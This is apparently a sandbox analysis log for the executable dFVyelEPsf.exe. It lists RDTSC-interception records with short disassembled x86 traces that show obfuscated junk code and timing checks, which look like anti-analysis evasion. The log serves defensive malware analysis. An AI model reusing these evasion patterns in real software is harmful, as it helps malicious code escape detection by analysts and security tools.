Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0E1D1 second address: F0E263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+12449830h], edx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FA52075DA58h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov di, 70E6h 0x00000034 mov dword ptr [ebp+12441D37h], ecx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov edi, dword ptr [ebp+122DB22Dh] 0x00000047 mov eax, dword ptr [ebp+122D1145h] 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007FA52075DA58h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 0000001Dh 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 mov dword ptr [ebp+122D242Ah], edi 0x0000006d push FFFFFFFFh 0x0000006f or bx, E652h 0x00000074 or edi, 27824A6Ch 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0E263 second address: F0E26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA521013236h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F100C3 second address: F100C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F100C7 second address: F100CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F100CB second address: F100D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F100D1 second address: F100D6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F14573 second address: F1457B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F101CD second address: F101D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F120B8 second address: F120BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F120BD second address: F120D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d js 00007FA521013236h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F121B6 second address: F121BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F121BA second address: F121C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F121C0 second address: F121C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F121C6 second address: F121CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F1118B second address: F1118F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F1118F second address: F111A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA52101323Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F111A4 second address: F111AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F111AA second address: F111AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F15602 second address: F156AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA52075DA64h 0x0000000f nop 0x00000010 mov ebx, dword ptr [ebp+12441866h] 0x00000016 push dword ptr fs:[00000000h] 0x0000001d call 00007FA52075DA61h 0x00000022 sub di, 88C3h 0x00000027 pop ebx 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f pushad 0x00000030 mov edi, dword ptr [ebp+122D28D3h] 0x00000036 mov ecx, dword ptr [ebp+122D20C8h] 0x0000003c popad 0x0000003d mov eax, dword ptr [ebp+122D0455h] 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 call 00007FA52075DA58h 0x0000004b pop eax 0x0000004c mov dword ptr [esp+04h], eax 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc eax 0x00000059 push eax 0x0000005a ret 0x0000005b pop eax 0x0000005c ret 0x0000005d push FFFFFFFFh 0x0000005f mov ebx, dword ptr [ebp+122D181Eh] 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FA52075DA61h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F1825B second address: F182EA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA521013236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FA521013238h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sub dword ptr [ebp+12441E54h], edi 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007FA521013238h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 jmp 00007FA521013247h 0x0000004e push 00000000h 0x00000050 sbb edi, 12334157h 0x00000056 xchg eax, esi 0x00000057 jp 00007FA52101323Ch 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jbe 00007FA521013238h 0x00000066 push ebx 0x00000067 pop ebx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F175F9 second address: F175FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F182EA second address: F182F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FA521013236h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F175FD second address: F17609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F17609 second address: F1760D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F1918B second address: F19233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FA52075DA56h 0x00000009 jg 00007FA52075DA56h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 call 00007FA52075DA67h 0x00000018 pop ebx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FA52075DA58h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 add ebx, 79CBB6D1h 0x0000003b jmp 00007FA52075DA68h 0x00000040 mov edi, 3EDB8814h 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push edi 0x0000004a call 00007FA52075DA58h 0x0000004f pop edi 0x00000050 mov dword ptr [esp+04h], edi 0x00000054 add dword ptr [esp+04h], 00000015h 0x0000005c inc edi 0x0000005d push edi 0x0000005e ret 0x0000005f pop edi 0x00000060 ret 0x00000061 mov ebx, dword ptr [ebp+122D2332h] 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FA52075DA5Dh 0x0000006f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F18460 second address: F18464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F18464 second address: F18515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D2008h], edi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 call 00007FA52075DA60h 0x0000001d add edi, dword ptr [ebp+122D24A4h] 0x00000023 pop edi 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007FA52075DA58h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D1C0Fh] 0x0000004b mov eax, dword ptr [ebp+122D0B75h] 0x00000051 push 00000000h 0x00000053 push ebx 0x00000054 call 00007FA52075DA58h 0x00000059 pop ebx 0x0000005a mov dword ptr [esp+04h], ebx 0x0000005e add dword ptr [esp+04h], 00000015h 0x00000066 inc ebx 0x00000067 push ebx 0x00000068 ret 0x00000069 pop ebx 0x0000006a ret 0x0000006b mov ebx, dword ptr [ebp+122D374Bh] 0x00000071 push FFFFFFFFh 0x00000073 nop 0x00000074 je 00007FA52075DA5Eh 0x0000007a jc 00007FA52075DA58h 0x00000080 push edi 0x00000081 pop edi 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007FA52075DA5Dh 0x0000008a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F18515 second address: F1851B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F2492E second address: F24932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F24932 second address: F24949 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FA52101323Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F24949 second address: F2494D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F29A75 second address: F29A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F29A79 second address: F29AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jnl 00007FA52075DA64h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F29AA1 second address: F29AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA521013241h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F29AB6 second address: F29ADB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F29ADB second address: F29ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F29B9D second address: F29BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F29BA1 second address: F29BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EBCCA6 second address: EBCCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA52075DA56h 0x0000000a jmp 00007FA52075DA5Eh 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EBCCCB second address: EBCCCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F2DE85 second address: F2DE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F2E4FD second address: F2E51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jmp 00007FA521013248h 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F2E51C second address: F2E521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F32954 second address: F32976 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA52101323Ch 0x00000008 jns 00007FA521013236h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FA52101323Eh 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F32976 second address: F3297F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F3297F second address: F32983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F32AEE second address: F32B03 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA52075DA5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F32B03 second address: F32B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F32C5B second address: F32CB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA52075DA5Dh 0x00000011 pushad 0x00000012 jbe 00007FA52075DA56h 0x00000018 jmp 00007FA52075DA62h 0x0000001d jmp 00007FA52075DA69h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F32CB5 second address: F32CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F32634 second address: F32649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jl 00007FA52075DA56h 0x0000000e jp 00007FA52075DA56h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F32649 second address: F32654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FA521013236h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F39594 second address: F395AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA52075DA64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F395AC second address: F395B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F395B0 second address: F395C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FA52075DA5Eh 0x0000000c je 00007FA52075DA56h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F395C4 second address: F395CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F38041 second address: F3805E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA52075DA56h 0x00000008 jmp 00007FA52075DA63h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F3805E second address: F38066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F3833E second address: F38344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F38344 second address: F3834C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F3834C second address: F3835E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA52075DA5Ch 0x00000008 jne 00007FA52075DA56h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F3893A second address: F3893E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F3893E second address: F38944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F38944 second address: F3894A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F3894A second address: F3894E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F3894E second address: F38952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F38ABB second address: F38AC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F38AC9 second address: F38AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F38AD5 second address: F38AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA52075DA67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F38AF0 second address: F38AFA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA521013236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F38AFA second address: F38B07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F38C6D second address: F38C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F38C73 second address: F38C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA52075DA56h 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f popad 0x00000010 jl 00007FA52075DA6Ah 0x00000016 pushad 0x00000017 ja 00007FA52075DA56h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F38F7D second address: F38FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA52101324Dh 0x0000000a jmp 00007FA52101323Fh 0x0000000f push edi 0x00000010 jmp 00007FA52101323Ch 0x00000015 pop edi 0x00000016 popad 0x00000017 push ecx 0x00000018 ja 00007FA52101323Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 pop esi 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EE39F9 second address: EE3A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA52075DA56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F37C61 second address: F37C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F37C66 second address: F37C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FA52075DA67h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007FA52075DA5Eh 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F3CFC3 second address: F3CFC9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EBB1C3 second address: EBB1C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F41699 second address: F4169D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F4169D second address: F416A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
